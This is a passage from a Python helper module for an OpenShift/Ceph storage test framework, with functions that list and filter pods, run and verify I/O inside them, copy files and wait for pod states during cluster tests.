        authkey (str): Authentication file (.pem file)
        cmd (str): command to run on server from pod
        user (str): User name to connect to server (default: root)
    """
    user = user or "root"
    cmd = f'ssh -i {authkey} -o "StrictHostKeyChecking no" {user}@{server} {cmd}'
    self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def get_memory(self, container_name):
    """
    Get the pod memory size

    Args:
        container_name (str): The name of the container to look for

    Returns:
        str: The container memory size (e.g. '5Gi')
    """
    pod_containers = self.pod_data.get("spec").get("containers")
    matched_containers = [
        c for c in pod_containers if c.get("name") == container_name
    ]
    if len(matched_containers) > 1:
        # Duplicate names are logged but the first match is still used
        logger.error(
            f"Multiple containers, of the same name, were found: {[c.get('name') for c in matched_containers]}"
        )
    # NOTE(review): raises IndexError if no container matches - confirm
    # callers always pass an existing container name.
    container = matched_containers[0]
    return container.get("resources").get("limits").get("memory")
def get_node(self):
    """
    Gets the node name

    Returns:
        str: Node name
    """
    if config.ENV_DATA.get(
        "platform", ""
    ).lower() == "aws" and config.DEPLOYMENT.get("local_storage"):
        # AWS + local storage deployments read the node from the pod's
        # nodeSelector instead of nodeName
        return self.pod_data["spec"]["nodeSelector"]["kubernetes.io/hostname"]
    else:
        return self.pod_data["spec"]["nodeName"]
# Helper functions for Pods
def get_all_pods(
    namespace=None,
    selector=None,
    selector_label="app",
    exclude_selector=False,
    wait=False,
):
    """
    Get all pods in a namespace.

    Args:
        namespace (str): Name of the namespace.
            If namespace is None - get all pods.
        selector (list): List of the resource selector to search with.
            Example: ['alertmanager', 'prometheus']
        selector_label (str): Label of selector (default: app).
        exclude_selector (bool): If True, keep only pods whose label value
            is NOT in ``selector``.
        wait (bool): If True, sleep before listing, so pods that fail over
            after a node failure have time to come up.

    Returns:
        list: List of Pod objects
    """
    ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
    if wait:
        # In case of >4 worker nodes, node failures cause automatic failover
        # of pods to other nodes - wait for the pods to stabilize first.
        wait_time = 180
        logger.info(f"Waiting for {wait_time}s for the pods to stabilize")
        time.sleep(wait_time)
    pods = ocp_pod_obj.get()["items"]
    if selector:
        # Single filtering pass; exclude_selector only flips the membership test
        keep = (
            (lambda value: value not in selector)
            if exclude_selector
            else (lambda value: value in selector)
        )
        pods = [
            pod
            for pod in pods
            if keep(pod["metadata"].get("labels", {}).get(selector_label))
        ]
    return [Pod(**pod) for pod in pods]
def get_ceph_tools_pod():
    """
    Get the Ceph tools pod

    Returns:
        Pod object: The Ceph tools pod object
    """
    ocp_pod_obj = OCP(
        kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"]
    )
    ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"]
    if not ct_pod_items:
        # setup ceph_toolbox pod if the cluster has been setup by some other CI
        setup_ceph_toolbox()
        ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"]
    assert ct_pod_items, "No Ceph tools pod found"

    # In the case of node failure, the CT pod will be recreated with the old
    # one in status Terminated. Therefore, need to filter out the Terminated pod
    running_ct_pods = [
        pod
        for pod in ct_pod_items
        if ocp_pod_obj.get_resource_status(pod.get("metadata").get("name"))
        == constants.STATUS_RUNNING
    ]
    assert running_ct_pods, "No running Ceph tools pod found"
    return Pod(**running_ct_pods[0])
def get_csi_provisioner_pod(interface):
    """
    Get the provisioner pod names based on interface

    Args:
        interface (str): Storage interface (e.g. constants.CEPHBLOCKPOOL)

    Returns:
        tuple: Names (str) of the two provisioner pods for the interface
    """
    ocp_pod_obj = OCP(
        kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"]
    )
    if interface in (constants.CEPHBLOCKPOOL, constants.CEPHBLOCKPOOL_THICK):
        selector = "app=csi-rbdplugin-provisioner"
    else:
        selector = "app=csi-cephfsplugin-provisioner"
    provision_pod_items = ocp_pod_obj.get(selector=selector)["items"]
    assert provision_pod_items, f"No {interface} provisioner pod found"
    # NOTE(review): assumes at least two provisioner replicas exist;
    # raises IndexError otherwise - confirm against the deployment.
    return (
        Pod(**provision_pod_items[0]).name,
        Pod(**provision_pod_items[1]).name,
    )
def get_csi_snapshoter_pod():
    """
    Get the csi snapshot controller pod name

    Returns:
        str: Name of the csi snapshot controller pod
    """
    ocp_pod_obj = OCP(
        kind=constants.POD, namespace="openshift-cluster-storage-operator"
    )
    selector = "app=csi-snapshot-controller"
    snapshotner_pod = ocp_pod_obj.get(selector=selector)["items"]
    return Pod(**snapshotner_pod[0]).name
def get_rgw_pods(rgw_label=constants.RGW_APP_LABEL, namespace=None):
    """
    Fetches info about rgw pods in the cluster

    Args:
        rgw_label (str): label associated with rgw pods
            (default: constants.RGW_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: the configured cluster namespace)

    Returns:
        list: Pod objects of rgw pods
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    rgws = get_pods_having_label(rgw_label, namespace)
    return [Pod(**rgw) for rgw in rgws]
def get_ocs_operator_pod(ocs_label=constants.OCS_OPERATOR_LABEL, namespace=None):
    """
    Fetches info about the ocs-operator pod in the cluster

    Args:
        ocs_label (str): label associated with ocs_operator pod
            (default: constants.OCS_OPERATOR_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: the configured cluster namespace)

    Returns:
        Pod object: ocs_operator pod object
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    ocs_operator = get_pods_having_label(ocs_label, namespace)
    return Pod(**ocs_operator[0])
def list_ceph_images(pool_name="rbd"):
    """
    List the RBD images in a Ceph pool.

    Args:
        pool_name (str): Name of the pool to get the ceph images

    Returns:
        list: List of RBD images in the pool
    """
    ct_pod = get_ceph_tools_pod()
    return ct_pod.exec_ceph_cmd(ceph_cmd=f"rbd ls {pool_name}", format="json")
@retry(TypeError, tries=5, delay=2, backoff=1)
def check_file_existence(pod_obj, file_path):
    """
    Check if file exists inside the pod

    Args:
        pod_obj (Pod): The object of the pod
        file_path (str): The full path of the file to look for inside
            the pod

    Returns:
        bool: True if the file exists, False otherwise
    """
    # Make sure `find` is available in the pod; install it on demand
    try:
        check_if_executable_in_path(pod_obj.exec_cmd_on_pod("which find"))
    except CommandFailed:
        pod_obj.install_packages("findutils")
    ret = pod_obj.exec_cmd_on_pod(f'bash -c "find {file_path}"')
    # NOTE(review): file_path is used as a regex pattern here - metacharacters
    # in the path are interpreted, not matched literally.
    return bool(re.search(file_path, ret))
def get_file_path(pod_obj, file_name):
    """
    Get the full path of the file

    Args:
        pod_obj (Pod): The object of the pod
        file_name (str): The name of the file for which path to get

    Returns:
        str: The full path of the file (mount path of the first volumeMount
            of the first container joined with ``file_name``)
    """
    path = (
        pod_obj.get()
        .get("spec")
        .get("containers")[0]
        .get("volumeMounts")[0]
        .get("mountPath")
    )
    return os.path.join(path, file_name)
def cal_md5sum(pod_obj, file_name, block=False):
    """
    Calculates the md5sum of the file

    Args:
        pod_obj (Pod): The object of the pod
        file_name (str): The name of the file for which md5sum to be calculated
        block (bool): True if the volume mode of PVC used on pod is 'Block'.
            file_name will be the devicePath in this case.

    Returns:
        str: The md5sum of the file
    """
    file_path = file_name if block else get_file_path(pod_obj, file_name)
    md5sum_cmd_out = pod_obj.exec_cmd_on_pod(
        command=f'bash -c "md5sum {file_path}"', out_yaml_format=False
    )
    # md5sum prints "<digest>  <path>"; keep only the digest
    md5sum = md5sum_cmd_out.split()[0]
    logger.info(f"md5sum of file {file_name}: {md5sum}")
    return md5sum
def verify_data_integrity(pod_obj, file_name, original_md5sum, block=False):
    """
    Verifies existence and md5sum of file created from first pod

    Args:
        pod_obj (Pod): The object of the pod
        file_name (str): The name of the file for which md5sum to be calculated
        original_md5sum (str): The original md5sum of the file
        block (bool): True if the volume mode of PVC used on pod is 'Block'.
            file_name will be the devicePath in this case.

    Returns:
        bool: True if the file exists and md5sum matches

    Raises:
        AssertionError: If file doesn't exist or md5sum mismatch
    """
    file_path = file_name if block else get_file_path(pod_obj, file_name)
    assert check_file_existence(pod_obj, file_path), f"File {file_name} doesn't exists"
    current_md5sum = cal_md5sum(pod_obj, file_name, block)
    logger.info(f"Original md5sum of file: {original_md5sum}")
    logger.info(f"Current md5sum of file: {current_md5sum}")
    assert current_md5sum == original_md5sum, "Data corruption found"
    logger.info(f"File {file_name} exists and md5sum matches")
    return True
def get_fio_rw_iops(pod_obj):
    """
    Log read/write IOPS of a finished FIO run on a pod.

    Args:
        pod_obj (Pod): The object of the pod
    """
    fio_result = pod_obj.get_fio_results()
    # Use the module-level logger for consistency with the rest of the module
    # (was logging.info, which logs via the root logger)
    logger.info(f"FIO output: {fio_result}")
    logger.info("IOPs after FIO:")
    logger.info(f"Read: {fio_result.get('jobs')[0].get('read').get('iops')}")
    logger.info(f"Write: {fio_result.get('jobs')[0].get('write').get('iops')}")
def run_io_in_bg(pod_obj, expect_to_fail=False, fedora_dc=False):
    """
    Run I/O in the background

    Args:
        pod_obj (Pod): The object of the pod
        expect_to_fail (bool): True for the command to be expected to fail
            (disruptive operations), False otherwise
        fedora_dc (bool): set to False by default. If set to True, it runs IO in
            background on a fedora dc pod.

    Returns:
        Thread: A thread of the I/O execution

    Raises:
        TimeoutExpiredError: If the I/O did not start within 20 seconds
    """
    logger.info(f"Running I/O on pod {pod_obj.name}")

    def exec_run_io_cmd(pod_obj, expect_to_fail, fedora_dc):
        """
        Execute I/O
        """
        try:
            # Writing content to a new file every 0.01 seconds.
            # Without sleep, the device will run out of space very quickly -
            # 5-10 seconds for a 5GB device
            if fedora_dc:
                FILE = FEDORA_TEST_FILE
            else:
                FILE = TEST_FILE
            pod_obj.exec_cmd_on_pod(
                command=f'bash -c "let i=0; while true; do echo '
                f'{TEXT_CONTENT} >> {FILE}$i; let i++; sleep 0.01; done"',
                timeout=2400,
            )
        # Once the pod gets deleted, the I/O execution will get terminated.
        # Hence, catching this exception
        except CommandFailed as ex:
            if expect_to_fail:
                # 137/143 = killed/terminated, which is expected on disruption
                if re.search("code 137", str(ex)) or (re.search("code 143", str(ex))):
                    logger.info("I/O command got terminated as expected")
                    return
            raise ex

    thread = Thread(target=exec_run_io_cmd, args=(pod_obj, expect_to_fail, fedora_dc))
    thread.start()
    time.sleep(2)

    # Checking file existence
    if fedora_dc:
        FILE = FEDORA_TEST_FILE
    else:
        FILE = TEST_FILE
    test_file = FILE + "1"

    # Check I/O started
    try:
        for sample in TimeoutSampler(
            timeout=20,
            sleep=1,
            func=check_file_existence,
            pod_obj=pod_obj,
            file_path=test_file,
        ):
            if sample:
                break
            logger.info(f"Waiting for I/O to start inside {pod_obj.name}")
    except TimeoutExpiredError:
        logger.error(
            f"Wait timeout: I/O failed to start inside {pod_obj.name}. "
            "Collect file list."
        )
        parent_dir = os.path.join(TEST_FILE, os.pardir)
        pod_obj.exec_cmd_on_pod(
            command=f"ls -l {os.path.abspath(parent_dir)}", out_yaml_format=False
        )
        raise TimeoutExpiredError(f"I/O failed to start inside {pod_obj.name}")
    return thread
def get_admin_key_from_ceph_tools():
    """
    Fetches admin key secret from ceph

    Returns:
        admin keyring encoded with base64 as a string
    """
    ceph_tools = get_ceph_tools_pod()
    key_out = ceph_tools.exec_ceph_cmd(ceph_cmd="ceph auth get-key client.admin")
    return base64.b64encode(key_out["key"].encode()).decode()
def run_io_and_verify_mount_point(pod_obj, bs="10M", count="950"):
    """
    Run I/O on mount point

    Args:
        pod_obj (Pod): The object of the pod
        bs (str): Read and write up to bytes at a time
        count (str): Copy only N input blocks

    Returns:
        used_percentage (str): Used percentage on mount point
    """
    dd_cmd = f"dd if=/dev/urandom of=/var/lib/www/html/dd_a bs={bs} count={count}"
    pod_obj.exec_cmd_on_pod(command=dd_cmd)
    # Verify data's are written to mount-point
    df_fields = pod_obj.exec_cmd_on_pod(command="df -kh").split()
    # 'df' prints the usage column directly before the mount point column
    return df_fields[df_fields.index("/var/lib/www/html") - 1]
def get_pods_having_label(label, namespace):
    """
    Fetches pod resources with given label in given namespace

    Args:
        label (str): label which pods might have
        namespace (str): Namespace in which to be looked up

    Return:
        list: of pods info
    """
    pod_ocp = OCP(kind=constants.POD, namespace=namespace)
    return pod_ocp.get(selector=label).get("items")
def get_deployments_having_label(label, namespace):
    """
    Fetches deployment resources with given label in given namespace

    Args:
        label (str): label which deployments might have
        namespace (str): Namespace in which to be looked up

    Return:
        list: deployment OCP instances
    """
    deployment_ocp = OCP(kind=constants.DEPLOYMENT, namespace=namespace)
    return deployment_ocp.get(selector=label).get("items")
def get_mds_pods(mds_label=constants.MDS_APP_LABEL, namespace=None):
    """
    Fetches info about mds pods in the cluster

    Args:
        mds_label (str): label associated with mds pods
            (default: defaults.MDS_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: defaults.ROOK_CLUSTER_NAMESPACE)

    Returns:
        list : of mds pod objects
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**info) for info in get_pods_having_label(mds_label, namespace)]
def get_mon_pods(mon_label=constants.MON_APP_LABEL, namespace=None):
    """
    Fetches info about mon pods in the cluster

    Args:
        mon_label (str): label associated with mon pods
            (default: defaults.MON_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: defaults.ROOK_CLUSTER_NAMESPACE)

    Returns:
        list : of mon pod objects
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**info) for info in get_pods_having_label(mon_label, namespace)]
def get_mgr_pods(mgr_label=constants.MGR_APP_LABEL, namespace=None):
    """
    Fetches info about mgr pods in the cluster

    Args:
        mgr_label (str): label associated with mgr pods
            (default: defaults.MGR_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: defaults.ROOK_CLUSTER_NAMESPACE)

    Returns:
        list : of mgr pod objects
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**info) for info in get_pods_having_label(mgr_label, namespace)]
def get_osd_pods(osd_label=constants.OSD_APP_LABEL, namespace=None):
    """
    Fetches info about osd pods in the cluster

    Args:
        osd_label (str): label associated with osd pods
            (default: defaults.OSD_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: defaults.ROOK_CLUSTER_NAMESPACE)

    Returns:
        list : of osd pod objects
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**info) for info in get_pods_having_label(osd_label, namespace)]
def get_osd_prepare_pods(
    osd_prepare_label=constants.OSD_PREPARE_APP_LABEL,
    namespace=defaults.ROOK_CLUSTER_NAMESPACE,
):
    """
    Fetches info about osd prepare pods in the cluster

    Args:
        osd_prepare_label (str): label associated with osd prepare pods
            (default: constants.OSD_PREPARE_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: defaults.ROOK_CLUSTER_NAMESPACE)

    Returns:
        list: OSD prepare pod objects
    """
    # Fall back to the configured namespace when an explicit None is passed
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**info) for info in get_pods_having_label(osd_prepare_label, namespace)]
def get_osd_deployments(osd_label=constants.OSD_APP_LABEL, namespace=None):
    """
    Fetches info about osd deployments in the cluster

    Args:
        osd_label (str): label associated with osd deployments
            (default: defaults.OSD_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: defaults.ROOK_CLUSTER_NAMESPACE)

    Returns:
        list: OSD deployment OCS instances
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    return [OCS(**info) for info in get_deployments_having_label(osd_label, namespace)]
def get_pod_count(label, namespace=None):
    """
    Count the pods carrying the given label in the given namespace.

    Args:
        label (str): label which pods might have
        namespace (str): Namespace in which to be looked up
            (default: the configured cluster namespace)

    Returns:
        int: Number of pods found for the label
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    return len(get_pods_having_label(label=label, namespace=namespace))
def get_cephfsplugin_provisioner_pods(
    cephfsplugin_provisioner_label=constants.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL,
    namespace=None,
):
    """
    Fetches info about CSI Cephfs plugin provisioner pods in the cluster

    Args:
        cephfsplugin_provisioner_label (str): label associated with cephfs
            provisioner pods
            (default: defaults.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: defaults.ROOK_CLUSTER_NAMESPACE)

    Returns:
        list : csi-cephfsplugin-provisioner Pod objects
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    pod_dicts = get_pods_having_label(cephfsplugin_provisioner_label, namespace)
    return [Pod(**pod_dict) for pod_dict in pod_dicts]
def get_rbdfsplugin_provisioner_pods(
    rbdplugin_provisioner_label=constants.CSI_RBDPLUGIN_PROVISIONER_LABEL,
    namespace=None,
):
    """
    Fetches info about CSI RBD plugin provisioner pods in the cluster

    Args:
        rbdplugin_provisioner_label (str): label associated with RBD
            provisioner pods
            (default: defaults.CSI_RBDPLUGIN_PROVISIONER_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: defaults.ROOK_CLUSTER_NAMESPACE)

    Returns:
        list : csi-rbdplugin-provisioner Pod objects
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    pods = get_pods_having_label(rbdplugin_provisioner_label, namespace)
    # Local renamed from the original typo 'ebd_plugin_pods'
    rbd_plugin_pods = [Pod(**pod) for pod in pods]
    return rbd_plugin_pods
def get_pod_obj(name, namespace=None):
    """
    Returns the pod obj for the given pod

    Args:
        name (str): Name of the resources
        namespace (str): Namespace in which the pod lives

    Returns:
        obj : A pod object
    """
    ocp_handle = OCP(api_version="v1", kind=constants.POD, namespace=namespace)
    return Pod(**ocp_handle.get(resource_name=name))
def get_pod_logs(
    pod_name, container=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE, previous=False
):
    """
    Get logs from a given pod

    Args:
        pod_name (str): Name of the pod
        container (str): Name of the container
        namespace (str): Namespace of the pod
        previous (bool): True, if pod previous log required. False otherwise.

    Returns:
        str: Output from 'oc get logs <pod_name> command
    """
    pod_ocp = OCP(kind=constants.POD, namespace=namespace)
    cmd_parts = [f"logs {pod_name}"]
    if container:
        cmd_parts.append(f"-c {container}")
    if previous:
        cmd_parts.append("--previous")
    return pod_ocp.exec_oc_cmd(" ".join(cmd_parts), out_yaml_format=False)
def get_pod_node(pod_obj):
    """
    Get the node that the pod is running on

    Args:
        pod_obj (OCS): The pod object

    Returns:
        ocs_ci.ocs.ocp.OCP: The node object
    """
    hosting_node = pod_obj.get().get("spec").get("nodeName")
    return node.get_node_objs(node_names=hosting_node)[0]
def delete_pods(pod_objs, wait=True):
    """
    Deletes list of the pod objects

    Args:
        pod_objs (list): List of the pod objects to be deleted
        wait (bool): Determines if the delete command should wait for
            completion
    """
    for pod_obj in pod_objs:
        pod_obj.delete(wait=wait)
def validate_pods_are_respinned_and_running_state(pod_objs_list):
    """
    Verifies the list of the pods are respinned and in running state

    Args:
        pod_objs_list (list): List of the pods obj

    Returns:
        bool : True if the pods are respinned and running, False otherwise

    Raises:
        ResourceWrongStatusException: In case the resources hasn't
            reached the Running state
    """
    for pod in pod_objs_list:
        helpers.wait_for_resource_state(pod, constants.STATUS_RUNNING, timeout=180)
    for pod in pod_objs_list:
        start_time = pod.get()["status"]["startTime"]
        # A respun pod should be young; an hour-old start time means it was
        # never restarted
        started_at = calendar.timegm(time.strptime(start_time, "%Y-%m-%dT%H:%M:%SZ"))
        age_seconds = time.time() - started_at
        if age_seconds >= 3600:
            logger.error(
                f"Pod {pod.name} is not respinned, the age of the pod is {start_time}"
            )
            return False
    return True
def verify_node_name(pod_obj, node_name):
    """
    Verifies that the pod is running on a particular node

    Args:
        pod_obj (Pod): The pod object
        node_name (str): The name of node to check

    Returns:
        bool: True if the pod is running on a particular node, False otherwise
    """
    logger.info(
        f"Checking whether the pod {pod_obj.name} is running on " f"node {node_name}"
    )
    actual_node = pod_obj.get().get("spec").get("nodeName")
    if actual_node != node_name:
        logger.info(
            f"The pod {pod_obj.name} is not running on the specified node "
            f"specified node: {node_name}, actual node: {actual_node}"
        )
        return False
    logger.info(
        f"The pod {pod_obj.name} is running on the specified node " f"{actual_node}"
    )
    return True
def get_pvc_name(pod_obj):
    """
    Function to get pvc_name from pod_obj

    Args:
        pod_obj (str): The pod object

    Returns:
        str: The pvc name of a given pod_obj,

    Raises:
        UnavailableResourceException: If no pvc attached
    """
    first_volume = pod_obj.get().get("spec").get("volumes")[0]
    pvc_info = first_volume.get("persistentVolumeClaim")
    if not pvc_info:
        raise UnavailableResourceException
    return pvc_info.get("claimName")
def get_used_space_on_mount_point(pod_obj):
    """
    Get the used space on a mount point

    Args:
        pod_obj (POD): The pod object

    Returns:
        int: Percentage represent the used space on the mount point
    """
    # Verify data's are written to mount-point
    df_fields = pod_obj.exec_cmd_on_pod(command="df -kh").split()
    # 'df' prints the usage column directly before the mount point column
    return df_fields[df_fields.index(constants.MOUNT_POINT) - 1]
def get_plugin_pods(interface, namespace=None):
    """
    Fetches info of csi-cephfsplugin pods or csi-rbdplugin pods

    Args:
        interface (str): Interface type. eg: CephBlockPool, CephFileSystem
        namespace (str): Name of cluster namespace

    Returns:
        list : csi-cephfsplugin pod objects or csi-rbdplugin pod objects

    Raises:
        ValueError: If the interface is neither CephFileSystem nor
            CephBlockPool
    """
    if interface == constants.CEPHFILESYSTEM:
        plugin_label = constants.CSI_CEPHFSPLUGIN_LABEL
    elif interface == constants.CEPHBLOCKPOOL:
        plugin_label = constants.CSI_RBDPLUGIN_LABEL
    else:
        # The original silently fell through to a NameError on plugin_label;
        # fail with an explicit message instead
        raise ValueError(f"Unsupported interface: {interface}")
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    plugins_info = get_pods_having_label(plugin_label, namespace)
    return [Pod(**plugin) for plugin in plugins_info]
def get_plugin_provisioner_leader(interface, namespace=None, leader_type="provisioner"):
    """
    Get csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader pod

    Args:
        interface (str): Interface type. eg: CephBlockPool, CephFileSystem
        namespace (str): Name of cluster namespace
        leader_type (str): Parameter to check the lease. eg: 'snapshotter' to
            select external-snapshotter leader holder

    Returns:
        Pod: csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader
            pod

    Raises:
        KeyError: If leader_type is not one of the keys below
        AssertionError: If the lease has no holderIdentity
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    # Map each CSI sidecar type to the prefix of its Lease object's name
    leader_types = {
        "provisioner": namespace,
        "snapshotter": f"external-snapshotter-leader-{namespace}",
        "resizer": f"external-resizer-{namespace}",
        "attacher": f"external-attacher-{namespace}",
    }
    # NOTE(review): lease_cmd is only assigned for CephBlockPool/CephFileSystem;
    # any other interface value raises NameError below — confirm callers never
    # pass anything else.
    if interface == constants.CEPHBLOCKPOOL:
        lease_cmd = f"get leases {leader_types[leader_type]}-rbd-csi-ceph-com -o yaml"
    elif interface == constants.CEPHFILESYSTEM:
        lease_cmd = (
            f"get leases {leader_types[leader_type]}-cephfs-csi-ceph-com " "-o yaml"
        )
    ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
    lease = ocp_obj.exec_oc_cmd(command=lease_cmd)
    # The lease's holderIdentity field carries the name of the current leader
    leader = lease.get("spec").get("holderIdentity").strip()
    assert leader, "Couldn't identify plugin provisioner leader pod."
    logger.info(f"Plugin provisioner leader pod is {leader}")
    # Repoint the OCP handle at the leader pod so get() returns its resource
    ocp_obj._resource_name = leader
    leader_pod = Pod(**ocp_obj.get())
    return leader_pod
def get_operator_pods(operator_label=constants.OPERATOR_LABEL, namespace=None):
    """
    Fetches info about rook-ceph-operator pods in the cluster

    Args:
        operator_label (str): Label associated with rook-ceph-operator pod
        namespace (str): Namespace in which ceph cluster lives

    Returns:
        list : of rook-ceph-operator pod objects
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**info) for info in get_pods_having_label(operator_label, namespace)]
def upload(pod_name, localpath, remotepath, namespace=None):
    """
    Upload a file to pod

    Args:
        pod_name (str): Name of the pod
        localpath (str): Local file to upload
        remotepath (str): Target path on the pod
        namespace (str): The namespace of the pod
    """
    namespace = namespace or constants.DEFAULT_NAMESPACE
    expanded_local = os.path.expanduser(localpath)
    run_cmd(f"oc -n {namespace} cp {expanded_local} {pod_name}:{remotepath}")
def download_file_from_pod(pod_name, remotepath, localpath, namespace=None):
    """
    Download a file from a pod

    Args:
        pod_name (str): Name of the pod
        remotepath (str): Target path on the pod
        localpath (str): Local file to upload
        namespace (str): The namespace of the pod
    """
    namespace = namespace or constants.DEFAULT_NAMESPACE
    expanded_local = os.path.expanduser(localpath)
    run_cmd(f"oc -n {namespace} cp {pod_name}:{remotepath} {expanded_local}")
def wait_for_storage_pods(timeout=200):
    """
    Check all OCS pods status, they should be in Running or Completed state

    Args:
        timeout (int): Number of seconds to wait for pods to get into correct
            state

    Raises:
        ResourceWrongStatusException: If a non-crashcollector pod fails to
            reach the expected state within the timeout
    """
    all_pod_obj = get_all_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
    # Ignoring pods with "app=rook-ceph-detect-version" app label
    all_pod_obj = [
        pod
        for pod in all_pod_obj
        if pod.get_labels()
        and constants.ROOK_CEPH_DETECT_VERSION_LABEL not in pod.get_labels()
    ]
    for pod_obj in all_pod_obj:
        state = constants.STATUS_RUNNING
        # Deployer ('-1-deploy') and deviceset pods run to completion rather
        # than stay Running
        if any(i in pod_obj.name for i in ["-1-deploy", "ocs-deviceset"]):
            state = constants.STATUS_COMPLETED
        try:
            helpers.wait_for_resource_state(
                resource=pod_obj, state=state, timeout=timeout
            )
        except ResourceWrongStatusException:
            # 'rook-ceph-crashcollector' on the failed node stucks at
            # pending state. BZ 1810014 tracks it.
            # Ignoring 'rook-ceph-crashcollector' pod health check as
            # WA and deleting its deployment so that the pod
            # disappears. Will revert this WA once the BZ is fixed
            if "rook-ceph-crashcollector" in pod_obj.name:
                ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
                pod_name = pod_obj.name
                # Strip the replicaset and pod hash suffixes to get the
                # owning deployment's name
                deployment_name = "-".join(pod_name.split("-")[:-2])
                command = f"delete deployment {deployment_name}"
                ocp_obj.exec_oc_cmd(command=command)
                logger.info(f"Deleted deployment for pod {pod_obj.name}")
            else:
                raise
def verify_pods_upgraded(old_images, selector, count=1, timeout=720):
    """
    Verify that all pods do not have old image.

    Args:
        old_images (set): Set with old images.
        selector (str): Selector (e.g. app=ocs-osd)
        count (int): Number of resources for selector.
        timeout (int): Timeout in seconds to wait for pods to be upgraded.

    Raises:
        TimeoutException: If the pods didn't get upgraded till the timeout.
    """
    namespace = config.ENV_DATA["cluster_namespace"]
    info_message = (
        f"Waiting for {count} pods with selector: {selector} to be running "
        f"and upgraded."
    )
    logger.info(info_message)
    start_time = time.time()
    selector_label, selector_value = selector.split("=")
    # Initialize before the loop so the post-iteration checks cannot hit an
    # unbound name when the very first get_all_pods() raises CommandFailed.
    pods_len = 0
    while True:
        pod_count = 0
        try:
            pods = get_all_pods(namespace, [selector_value], selector_label)
            pods_len = len(pods)
            logger.info(f"Found {pods_len} pod(s) for selector: {selector}")
            if pods_len != count:
                logger.warning(
                    f"Number of found pods {pods_len} is not as expected: " f"{count}"
                )
            for pod in pods:
                verify_images_upgraded(old_images, pod.get())
                pod_count += 1
        except CommandFailed as ex:
            logger.warning(
                f"Failed when getting pods with selector {selector}." f"Error: {ex}"
            )
        except NonUpgradedImagesFoundError as ex:
            logger.warning(ex)
        # Raises once the overall timeout elapses
        check_timeout_reached(start_time, timeout, info_message)
        if pods_len != count:
            logger.error(f"Found pods: {pods_len} but expected: {count}!")
        elif pod_count == count:
            # All expected pods found and every image verified upgraded
            return
def get_noobaa_pods(noobaa_label=constants.NOOBAA_APP_LABEL, namespace=None):
    """
    Fetches info about noobaa pods in the cluster

    Args:
        noobaa_label (str): label associated with noobaa pods
            (default: defaults.NOOBAA_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: defaults.ROOK_CLUSTER_NAMESPACE)

    Returns:
        list : of noobaa pod objects
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**info) for info in get_pods_having_label(noobaa_label, namespace)]
def wait_for_dc_app_pods_to_reach_running_state(
    dc_pod_obj, timeout=120, exclude_state=None
):
    """
    Wait for DC app pods to reach running state

    Args:
        dc_pod_obj (list): list of dc app pod objects
        timeout (int): Timeout in seconds to wait for pods to be in Running
            state.
        exclude_state (str): A resource state to ignore
    """
    for pod_obj in dc_pod_obj:
        # Pods of one DeploymentConfig share the 'name' label; use it to
        # select all replicas of this app
        name = pod_obj.get_labels().get("name")
        dpod_list = get_all_pods(selector_label=f"name={name}", wait=True)
        for dpod in dpod_list:
            # Skip the deployer pod ('-1-deploy') and pods in the excluded state
            if "-1-deploy" not in dpod.name and dpod.status != exclude_state:
                helpers.wait_for_resource_state(
                    dpod, constants.STATUS_RUNNING, timeout=timeout
                )
def delete_deploymentconfig_pods(pod_obj):
    """
    Delete a DeploymentConfig pod and all the pods that are controlled by it

    Args:
        pod_obj (Pod): Pod object
    """
    dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace)
    # List all DeploymentConfigs in the pod's namespace; the matching DC's
    # metadata name equals the pod's 'name' label
    pod_data_list = dc_ocp_obj.get().get("items")
    if pod_data_list:
        for pod_data in pod_data_list:
            if pod_obj.get_labels().get("name") == pod_data.get("metadata").get("name"):
                # Deleting the DC also removes the pods it controls
                dc_ocp_obj.delete(resource_name=pod_obj.get_labels().get("name"))
                dc_ocp_obj.wait_for_delete(
                    resource_name=pod_obj.get_labels().get("name")
                )
def wait_for_new_osd_pods_to_come_up(number_of_osd_pods_before):
    """
    Wait up to 180 seconds until at least one osd pod beyond the original
    count reaches an init or running status; only logs the outcome.

